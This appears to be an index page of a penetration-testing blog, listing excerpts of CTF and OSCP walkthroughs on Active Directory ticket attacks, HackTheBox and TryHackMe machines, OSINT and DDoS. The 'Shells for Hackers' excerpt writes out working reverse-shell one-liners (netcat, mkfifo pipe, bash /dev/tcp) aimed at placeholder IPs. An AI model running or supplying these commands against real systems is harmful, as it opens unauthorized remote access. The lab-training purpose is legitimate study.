Golden Ticket Attacks
Active Directory (AD) is ubiquitous in enterprise networks, acting as the keystone for authentication and access. As with any system, AD isn’t immune to vulnerabilities. The Golden Ticket attack exemplifies a critical AD weakness, promising attackers unparalleled access once exploited. This article provides a granular, hands-on guide to Golden Ticket attacks for Capture The Flag […]
Shells for Hackers
This cheat sheet is an essential guide, designed to aid in swiftly deploying shells across various computing environments. Use it as a go-to reference. Reverse Shells Net Cat listener> nc -nlvp 31337nc -e /bin/sh 10.10.10.10 31337 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 31337 >/tmp/f Bash TCP bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh […]
Exploiting HeartBleed for OSCP | Valentine HackTheBox
HackTheBox presents “Valentine”, a vulnerable machine centered around OpenSSL’s well-known HeartBleed issue. This challenge pushes us to grapple with essential security concepts. The path to the flags involves decoding messages and navigating Linux for privilege escalation. In this walkthrough, I’ll share my approach to Valentine, highlighting the steps and strategies I used. Let’s dive into […]
SweetRice CMS Exploitation | LazyAdmin TryHackMe
LazyAdmin is a machine available on TRYHACKME, designed for those looking to hone their skills in a controlled environment. This box provides opportunities to delve into web application exploration, exploit a documented CVE within a CMS, and understand a fundamental privilege escalation technique. Key Takeaways Enumeration: Systematic exploration to identify open ports, active services, […]
Exploiting Samba with Metasploit | HackTheBox
Lame is a beginner-friendly box available on HackTheBox. In this walkthrough, I’ll go through Nmap, SMB file shares, anonymous FTP logins, Searchsploit, and Metasploit to tackle this machine. Insights Vulnerability Scanning: Utilizing tools like Nmap to identify open ports and potential weaknesses in services on a target system. Exploitation Techniques: Employing both automated tools […]
OSINT For CTF
Passive Information Gathering in CTFs: A Deep Dive into Essential Tools and Techniques Introduction Passive information gathering is a vital phase in Capture The Flag (CTF) competitions. This preliminary reconnaissance step involves collecting data about a target or network without actively interacting with it. Successful CTF participants often use a range of tools and techniques […]
Steganography and Hidden Data
Commands for Engagements
Nmap WPScan & SSL Nikto DNS_Recon Gobuster WFuzz Command Injection Sqlmap Social Recon SMTP User Enumeration SSH Tunnel Misc Bash Pull out IPV4 Addresses Search logs for user activity: Search for email addresses:
Pass the Ticket: An AD Attack Method
Pass-the-Ticket (PtT) is a popular method of attack in AD environments, capitalizing on Kerberos tickets to gain unauthorized access. This guide breaks down PtT for the active CTF player, offering actionable code and clear steps to execute under time pressure. PtT Basics In Kerberos authentication, tickets, rather than passwords, grant access to resources. If an […]
DDoS Attacks: How to Take Down a Server
Distributed Denial of service [DDOS] attacks are popular cyber-attacks that focus on taking down a system’s availability by denying resources to legitimate connections. DDOS attacks can be found in many forms, commonly as an attack that heavily congests a network to the point of being unusable. Furthermore, DDoS attacks crash or even destroy resources depending […]